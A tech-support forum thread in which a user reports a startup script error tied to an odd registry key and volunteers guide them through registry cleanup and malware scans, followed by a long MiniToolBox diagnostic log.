Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Script Error pop up when computer starts


  • Please log in to reply
12 replies to this topic

#1 HonSern

HonSern

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 04 September 2016 - 01:26 AM

Hi,

 

I'm not sure but i think my computer might have been infected by a malware due to my recent installation of software.

 

Could somebody please guide me through on a way to clean my computer from this matter? 

 

The script error is as below

An error has occured in the script on this page

Line: 1

Char: 72

Error: Invalid root in registry key "HKCU\software\pdgzul\dexpufdr"

Code: 0

URL: 

 

Please help me to resolve this problem 

 

 



BC AdBot (Login to Remove)

 


#2 kaljukass

kaljukass

  • Banned
  • 291 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:22 PM

Posted 04 September 2016 - 01:59 AM

If you're talking about the computer, then such a registry key does not have to be there at all.
Open regedit.exe, look for this key, ie find it, right-click it, and export (make a backup copy) and delete it completely.
Make a restart, and see what happened. When all was lost, the thing is settled, if not, you can continue searching.
Probably, this is kind of outdated and corrupted registry key. Obsolete key.
If You don't remember, how to open registry editor, then use this method:
WinKey + R => regedit.exe => OK or Enter


Edited by kaljukass, 04 September 2016 - 02:14 AM.


#3 HonSern

HonSern
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 04 September 2016 - 02:14 AM

Hi Kaljuk,

 

How do i search for that line of error in regedit??

 

I have tried searching for it under HKEY_CURRENT USER > SOFTWARE

but i couldn't seem to be able to locate a file that say "pdgzul"



#4 kaljukass

kaljukass

  • Banned
  • 291 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:22 PM

Posted 04 September 2016 - 02:26 AM

Use registry editor search if needed, Ie click on the first line on reg editor, it is "Computer", then open Edit in menu and there is find

put there the thing, what You want to find, ie pdgzul\dexpufdr

then click "Find next", if stops, then F3 till You have found

NB! do not delete nothing, if don't exactly know, what it is.

5Rt4hVn.jpg



#5 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,239 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:02:22 PM

Posted 04 September 2016 - 02:29 AM

It's likely that there is a malware issue, that would explain the random registry items. It may be hidden also.

 

acucz8_th.jpg Please download MiniToolBox, save it to your desktop and run it.

 

Checkmark the following checkboxes:

 

aak3k9.jpg

 

Click Go and note the saved Result.txt on your desktop, to copy into your reply

 

34hammr.jpg Download Security Check from here or here and save it to your Desktop.

  • Double-click SecurityCheck.exe
  • Follow the onscreen instructions inside of the black box.
  • please copy and paste the log into your reply.

If prompted by your firewall allow DIG.exe
If you receive UNSUPPORTED OPERATING SYSTEM! ABORTED! message restart computer and Security Check should run

 

149nkg7.jpg Please download Farbar Service Scanner and run it

  • Please check all of the boxes then click Scan
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log into your reply.

29bgcgg.jpg  Please download AdwCleaner and save to your Desktop. (if you have removed your previous copy)

  • Right click and "Run as Administrator"
  • Click on the Scan button.
  • After the scan has finished, click Clean
  • Click on the Report button...a logfile will open in Notepad for review.
  • A copy of all logfiles are saved in the C:\AdwCleaner folder which was created when running the tool, or you can save it to the desktop to be easily found for your reply.

 

2zh1g08.jpg  Please download Junkware Removal Tool to your desktop.

  • Shut down your protection software now to avoid potential conflicts.
  • Right click and "Run as Administrator".
  • The tool will open and start scanning your system.
  • On completion a log will open, note the saved JRT.txt on your desktop to copy into your reply

malwarebytes_icon_mini_by_linux_rules-d9  Please download and install MalwareBytes Anti-Malware.

  • You may want to uncheck the free trial for the premium version during installation.
  • Let the database version update on first run, before proceeding
  • Click "Scan now"
  • Click "remove threats" to remove all and follow the reboot instructions.
  • To export the log click on History > then click your scan log > Export > text file
  • Save on your desktop

Please copy and paste all of the logs into your reply and let me know if the problem persists.

 

TsVk!



#6 HonSern

HonSern
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 04 September 2016 - 03:38 AM

Hi TsVK

 

The log from MiniToolBox

 

MiniToolBox by Farbar  Version: 17-06-2016
Ran by User (administrator) on 04-09-2016 at 15:47:37
Running from "F:\迅雷下载"
Microsoft Windows 10 Home Single Language  (X64)
Model: GE62 6QD Manufacturer: Micro-Star International Co., Ltd.
Boot Mode: Normal
***************************************************************************
 
========================= Flush DNS: ===================================
 
Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========================= IE Proxy Settings: ============================== 
 
Proxy is not enabled.
No Proxy Server is set.
 
"Reset IE Proxy Settings": IE Proxy Settings were reset.
========================= Hosts content: =================================
========================= IP Configuration: ================================
 
Intel® Dual Band Wireless-AC 3165 = Wi-Fi 2 (Connected)
Killer E2400 Gigabit Ethernet Controller = Ethernet 2 (Media disconnected)
 
 
# ----------------------------------
# IPv4 Configuration
# ----------------------------------
pushd interface ipv4
 
reset
set global
set interface interface="Local Area Connection* 1" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Wi-Fi" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Local Area Connection* 2" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Bluetooth Network Connection" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Ethernet" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Ethernet 2" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Wi-Fi 2" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Local Area Connection* 4" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Bluetooth Network Connection 2" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
 
 
popd
# End of IPv4 configuration
 
 
 
Windows IP Configuration
 
   Host Name . . . . . . . . . . . . : MSI
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : domain.name
 
Ethernet adapter Ethernet 2:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : hc2.hc2
   Description . . . . . . . . . . . : Killer e2400 Gigabit Ethernet Controller #2
   Physical Address. . . . . . . . . : 4C-CC-6A-7E-56-62
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
 
Wireless LAN adapter Local Area Connection* 4:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter #2
   Physical Address. . . . . . . . . : B8-81-98-E1-24-0F
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
 
Wireless LAN adapter Wi-Fi 2:
 
   Connection-specific DNS Suffix  . : domain.name
   Description . . . . . . . . . . . : Intel® Dual Band Wireless-AC 3165 #2
   Physical Address. . . . . . . . . : B8-81-98-E1-24-0E
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : 2001:e68:443a:6cff:4958:db56:c788:45a5(Preferred) 
   Temporary IPv6 Address. . . . . . : 2001:e68:443a:6cff:94ce:64a9:e24f:64dd(Preferred) 
   Link-local IPv6 Address . . . . . : fe80::4958:db56:c788:45a5%3(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.1.2(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : Sunday, 4 September, 2016 2:18:10 PM
   Lease Expires . . . . . . . . . . : Monday, 5 September, 2016 2:18:13 PM
   Default Gateway . . . . . . . . . : fe80::9a70:e8ff:fe0a:e725%3
                                       192.168.1.1
   DHCP Server . . . . . . . . . . . : 192.168.1.1
   DHCPv6 IAID . . . . . . . . . . . : 45646232
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-1F-3D-CA-91-D8-CB-8A-7F-3A-DC
   DNS Servers . . . . . . . . . . . : fe80::9a70:e8ff:fe0a:e725%3
                                       192.168.1.1
   NetBIOS over Tcpip. . . . . . . . : Enabled
 
Tunnel adapter isatap.domain.name:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : domain.name
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
 
Tunnel adapter Teredo Tunneling Pseudo-Interface:
 
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : 2001:0:9d38:6ab8:385c:c9f7:3495:29fb(Preferred) 
   Link-local IPv6 Address . . . . . : fe80::385c:c9f7:3495:29fb%5(Preferred) 
   Default Gateway . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 486539264
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-1F-3D-CA-91-D8-CB-8A-7F-3A-DC
   NetBIOS over Tcpip. . . . . . . . : Disabled
Server:  UnKnown
Address:  fe80::9a70:e8ff:fe0a:e725
 
 
Pinging google.com [2404:6800:4003:c01::71] with 32 bytes of data:
Request timed out.
Request timed out.
 
Ping statistics for 2404:6800:4003:c01::71:
    Packets: Sent = 2, Received = 0, Lost = 2 (100% loss),
Server:  UnKnown
Address:  fe80::9a70:e8ff:fe0a:e725
 
 
Pinging yahoo.com [2001:4998:44:204::a7] with 32 bytes of data:
Request timed out.
Request timed out.
 
Ping statistics for 2001:4998:44:204::a7:
    Packets: Sent = 2, Received = 0, Lost = 2 (100% loss),
 
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
 
Ping statistics for 127.0.0.1:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
===========================================================================
Interface List
  9...4c cc 6a 7e 56 62 ......Killer e2400 Gigabit Ethernet Controller #2
 11...b8 81 98 e1 24 0f ......Microsoft Wi-Fi Direct Virtual Adapter #2
  3...b8 81 98 e1 24 0e ......Intel® Dual Band Wireless-AC 3165 #2
  1...........................Software Loopback Interface 1
 10...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
  5...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
===========================================================================
 
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0      192.168.1.1      192.168.1.2     25
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    306
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    306
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    306
      192.168.1.0    255.255.255.0         On-link       192.168.1.2    281
      192.168.1.2  255.255.255.255         On-link       192.168.1.2    281
    192.168.1.255  255.255.255.255         On-link       192.168.1.2    281
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link       192.168.1.2    281
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    306
  255.255.255.255  255.255.255.255         On-link       192.168.1.2    281
===========================================================================
Persistent Routes:
  None
 
IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  3    281 ::/0                     fe80::9a70:e8ff:fe0a:e725
  1    306 ::1/128                  On-link
  5    306 2001::/32                On-link
  5    306 2001:0:9d38:6ab8:385c:c9f7:3495:29fb/128
                                    On-link
  3    281 2001:e68:443a:6cff::/64  On-link
  3    281 2001:e68:443a:6cff:4958:db56:c788:45a5/128
                                    On-link
  3    281 2001:e68:443a:6cff:94ce:64a9:e24f:64dd/128
                                    On-link
  3    281 fe80::/64                On-link
  5    306 fe80::/64                On-link
  5    306 fe80::385c:c9f7:3495:29fb/128
                                    On-link
  3    281 fe80::4958:db56:c788:45a5/128
                                    On-link
  1    306 ff00::/8                 On-link
  3    281 ff00::/8                 On-link
  5    306 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None
========================= Winsock entries =====================================
 
Catalog5 01 C:\Windows\SysWOW64\napinsp.dll [55808] (Microsoft Corporation)
Catalog5 02 C:\Windows\SysWOW64\pnrpnsp.dll [70656] (Microsoft Corporation)
Catalog5 03 C:\Windows\SysWOW64\pnrpnsp.dll [70656] (Microsoft Corporation)
Catalog5 04 C:\Windows\SysWOW64\NLAapi.dll [65024] (Microsoft Corporation)
Catalog5 05 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog5 06 C:\Windows\SysWOW64\winrnr.dll [23552] (Microsoft Corporation)
Catalog5 07 C:\Windows\SysWOW64\wshbth.dll [51712] (Microsoft Corporation)
Catalog9 01 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 02 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 03 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 04 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 05 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 06 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 07 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 08 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 09 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 10 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 11 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 12 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
x64-Catalog5 01 C:\Windows\System32\napinsp.dll [68096] (Microsoft Corporation)
x64-Catalog5 02 C:\Windows\System32\pnrpnsp.dll [87040] (Microsoft Corporation)
x64-Catalog5 03 C:\Windows\System32\pnrpnsp.dll [87040] (Microsoft Corporation)
x64-Catalog5 04 C:\Windows\System32\NLAapi.dll [80896] (Microsoft Corporation)
x64-Catalog5 05 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog5 06 C:\Windows\System32\winrnr.dll [31744] (Microsoft Corporation)
x64-Catalog5 07 C:\Windows\System32\wshbth.dll [63488] (Microsoft Corporation)
x64-Catalog9 01 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 02 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 03 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 04 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 05 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 06 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 07 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 08 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 09 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 10 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 11 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 12 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
 
========================= Event log errors: ===============================
 
Application errors:
==================
Error: (09/04/2016 03:46:35 PM) (Source: Application Error) (User: )
Description: Faulting application name: regedit.exe, version: 10.0.10586.0, time stamp: 0x5632d798
Faulting module name: COMCTL32.dll, version: 6.10.10586.494, time stamp: 0x5775e30f
Exception code: 0xc00000fd
Fault offset: 0x00000000000037c9
Faulting process id: 0x2730
Faulting application start time: 0xregedit.exe0
Faulting application path: regedit.exe1
Faulting module path: regedit.exe2
Report Id: regedit.exe3
Faulting package full name: regedit.exe4
Faulting package-relative application ID: regedit.exe5
 
Error: (09/04/2016 02:19:13 PM) (Source: Perflib) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll8
 
Error: (09/04/2016 11:40:00 AM) (Source: Application Error) (User: )
Description: Faulting application name: WLANExt.exe, version: 10.0.10586.0, time stamp: 0x5632d7b9
Faulting module name: IWMSSvc.dll_unloaded, version: 18.12.0.0, time stamp: 0x559e4435
Exception code: 0xc0000005
Fault offset: 0x00000000000d8348
Faulting process id: 0x8b0
Faulting application start time: 0xWLANExt.exe0
Faulting application path: WLANExt.exe1
Faulting module path: WLANExt.exe2
Report Id: WLANExt.exe3
Faulting package full name: WLANExt.exe4
Faulting package-relative application ID: WLANExt.exe5
 
Error: (09/03/2016 01:28:39 PM) (Source: Microsoft-Windows-Immersive-Shell) (User: MSI)
Description: Activation of app Microsoft.Messaging_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2147023174 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (09/03/2016 10:28:09 AM) (Source: Application Error) (User: )
Description: Faulting application name: NvStreamUserAgent.exe, version: 4.1.2014.398, time stamp: 0x563b5873
Faulting module name: NvStreamUserAgent.exe, version: 4.1.2014.398, time stamp: 0x563b5873
Exception code: 0xc0000005
Fault offset: 0x000000000056e1f2
Faulting process id: 0x18f0
Faulting application start time: 0xNvStreamUserAgent.exe0
Faulting application path: NvStreamUserAgent.exe1
Faulting module path: NvStreamUserAgent.exe2
Report Id: NvStreamUserAgent.exe3
Faulting package full name: NvStreamUserAgent.exe4
Faulting package-relative application ID: NvStreamUserAgent.exe5
 
Error: (09/03/2016 09:47:36 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
The manifest file root element must be assembly.
 
Error: (09/03/2016 09:47:32 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "LAVFilters.Dependencies,type="win32",version="1.0.0.0"1".
Dependent Assembly LAVFilters.Dependencies,type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (09/03/2016 09:47:32 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "LAVFilters.Dependencies,type="win32",version="1.0.0.0"1".
Dependent Assembly LAVFilters.Dependencies,type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (09/03/2016 09:47:32 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "LAVFilters.Dependencies,type="win32",version="1.0.0.0"1".
Dependent Assembly LAVFilters.Dependencies,type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (09/03/2016 09:45:18 AM) (Source: Application Error) (User: )
Description: Faulting application name: NSc.exe, version: 2.1.0.21, time stamp: 0x573502f2
Faulting module name: Nahimic2OSD.dll, version: 0.0.0.0, time stamp: 0x56fb9c4b
Exception code: 0xc0000005
Fault offset: 0x00005c29
Faulting process id: 0x1724
Faulting application start time: 0xNSc.exe0
Faulting application path: NSc.exe1
Faulting module path: NSc.exe2
Report Id: NSc.exe3
Faulting package full name: NSc.exe4
Faulting package-relative application ID: NSc.exe5
 
 
System errors:
=============
Error: (09/04/2016 02:17:30 PM) (Source: Service Control Manager) (User: )
Description: The User Data Access_1d44a53 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 02:17:30 PM) (Source: Service Control Manager) (User: )
Description: The User Data Storage_1d44a53 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 02:17:30 PM) (Source: Service Control Manager) (User: )
Description: The Contact Data_1d44a53 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 02:17:30 PM) (Source: Service Control Manager) (User: )
Description: The Sync Host_1d44a53 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 12:32:51 PM) (Source: Service Control Manager) (User: )
Description: The User Data Access_907021 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 12:32:51 PM) (Source: Service Control Manager) (User: )
Description: The User Data Storage_907021 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 12:32:51 PM) (Source: Service Control Manager) (User: )
Description: The Contact Data_907021 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 12:32:51 PM) (Source: Service Control Manager) (User: )
Description: The Sync Host_907021 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 12:13:00 AM) (Source: Service Control Manager) (User: )
Description: The User Data Access_65edb service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 12:13:00 AM) (Source: Service Control Manager) (User: )
Description: The User Data Storage_65edb service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
 
Microsoft Office Sessions:
=========================
Error: (09/04/2016 03:46:35 PM) (Source: Application Error)(User: )
Description: regedit.exe10.0.10586.05632d798COMCTL32.dll6.10.10586.4945775e30fc00000fd00000000000037c9273001d2067be2a04f7cC:\Windows\regedit.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.494_none_a2d8b04ea53e3145\COMCTL32.dll2844e9ee-1a77-429b-90b2-7a9f7350d37b
 
Error: (09/04/2016 02:19:13 PM) (Source: Perflib)(User: )
Description: BITSC:\Windows\System32\bitsperf.dll8
 
Error: (09/04/2016 11:40:00 AM) (Source: Application Error)(User: )
Description: WLANExt.exe10.0.10586.05632d7b9IWMSSvc.dll_unloaded18.12.0.0559e4435c000000500000000000d83488b001d205f49fe6eee4C:\Windows\system32\WLANExt.exeIWMSSvc.dllc221775e-22e3-487f-90f7-1898a2153d3d
 
Error: (09/03/2016 01:28:39 PM) (Source: Microsoft-Windows-Immersive-Shell)(User: MSI)
Description: Microsoft.Messaging_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1-2147023174
 
Error: (09/03/2016 10:28:09 AM) (Source: Application Error)(User: )
Description: NvStreamUserAgent.exe4.1.2014.398563b5873NvStreamUserAgent.exe4.1.2014.398563b5873c0000005000000000056e1f218f001d2058ac177e0d5C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exeC:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exedcf0c40e-0005-4781-82d4-ee104cdd4f9a
 
Error: (09/03/2016 09:47:36 AM) (Source: SideBySide)(User: )
Description: c:\Program Files\WinZip\adxloader.dll.Manifestc:\Program Files\WinZip\adxloader.dll.Manifest2
 
Error: (09/03/2016 09:47:32 AM) (Source: SideBySide)(User: )
Description: LAVFilters.Dependencies,type="win32",version="1.0.0.0"C:\Users\Public\Thunder Network\APlayer\codecs\lavfilters\lavvideo.dll.Manifest
 
Error: (09/03/2016 09:47:32 AM) (Source: SideBySide)(User: )
Description: LAVFilters.Dependencies,type="win32",version="1.0.0.0"C:\Users\Public\Thunder Network\APlayer\codecs\lavfilters\lavsplitter.dll.Manifest
 
Error: (09/03/2016 09:47:32 AM) (Source: SideBySide)(User: )
Description: LAVFilters.Dependencies,type="win32",version="1.0.0.0"C:\Users\Public\Thunder Network\APlayer\codecs\lavfilters\lavaudio.dll.Manifest
 
Error: (09/03/2016 09:45:18 AM) (Source: Application Error)(User: )
Description: NSc.exe2.1.0.21573502f2Nahimic2OSD.dll0.0.0.056fb9c4bc000000500005c29172401d20584d2c0e494C:\Program Files (x86)\Norton Security\Engine\22.7.1.32\NSc.exeC:\Program Files\Nahimic\Nahimic2\UserInterface\Nahimic2OSD.dll9ccb728f-4ae0-48c8-97f0-c0fd0774f9ec
 
 
CodeIntegrity Errors:
===================================
  Date: 2016-09-04 11:59:09.286
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-03 22:59:03.632
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-03 17:29:09.226
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-02 23:19:34.322
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-02 22:59:11.219
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-02 22:13:41.917
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-02 22:10:36.826
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume5\Program Files\Nahimic\Nahimic2\UserInterface\x64\Nahimic2OSD.dll that did not meet the Store signing level requirements.
 
  Date: 2016-09-02 21:24:15.722
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-02 11:59:18.208
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-02 08:48:41.976
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
 
=========================== Installed Programs ============================
 
ACA & MEP 2016 Object Enabler (HKLM\...\{5783F2D7-F004-0000-5102-0060B0CE6BBA}) (Version: 7.8.41.0 - Autodesk) Hidden
ACAD Private (HKLM\...\{5783F2D7-F001-0000-3102-0060B0CE6BBA}) (Version: 20.1.49.0 - Autodesk) Hidden
Adobe Acrobat XI Pro (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-000000000006}) (Version: 11.0.16 - Adobe Systems)
Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.1 - Adobe Systems Incorporated)
Asmedia USB Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.16.28.1 - Asmedia Technology)
AutoCAD 2016 - English (HKLM\...\{5783F2D7-F001-0409-2102-0060B0CE6BBA}) (Version: 20.1.49.0 - Autodesk) Hidden
AutoCAD 2016 (HKLM\...\{5783F2D7-F001-0000-0102-0060B0CE6BBA}) (Version: 20.1.49.0 - Autodesk) Hidden
AutoCAD 2016 Language Pack - English (HKLM\...\{5783F2D7-F001-0409-1102-0060B0CE6BBA}) (Version: 20.1.49.0 - Autodesk) Hidden
Autodesk Advanced Material Library Image Library 2016 (HKLM-x32\...\{94AD53E7-493B-4291-8714-7A3B761D2783}) (Version: 6.3.0.15 - Autodesk)
Autodesk App Manager 2016 (HKLM-x32\...\{4ECF9E00-2978-46AF-BD80-455EFEAB7A93}) (Version: 2.0.0 - Autodesk)
Autodesk Application Manager (HKLM-x32\...\Autodesk Application Manager) (Version: 4.0.69.0 - Autodesk)
Autodesk AutoCAD 2016 - English (HKLM\...\AutoCAD 2016 - English) (Version: 20.1.49.0 - Autodesk)
Autodesk AutoCAD Performance Feedback Tool 1.2.4 (HKLM-x32\...\{4E20873D-BC20-495C-AFD9-B18877B7F9BB}) (Version: 1.2.4.0 - Autodesk)
Autodesk BIM 360 Glue AutoCAD 2016 Add-in 64 bit (HKLM\...\{4BEE127E-95C4-434D-ABAC-65155192BB24}) (Version: 4.35.1742 - Autodesk)
Autodesk Content Service (HKLM\...\{A37CDB58-AAE8-0000-8C13-E0F7BACB0D5F}) (Version: 3.2.0.0 - Autodesk) Hidden
Autodesk Content Service (HKLM\...\Autodesk Content Service) (Version: 3.2.0.0 - Autodesk)
Autodesk Content Service Language Pack (HKLM\...\{A37CDB58-AAE8-0001-8C13-E0F7BACB0D5F}) (Version: 3.2.0.0 - Autodesk) Hidden
Autodesk Featured Apps 2016 (HKLM-x32\...\{D42F37CD-9AF9-4435-A474-B387C5BB6B47}) (Version: 2.0.0 - Autodesk)
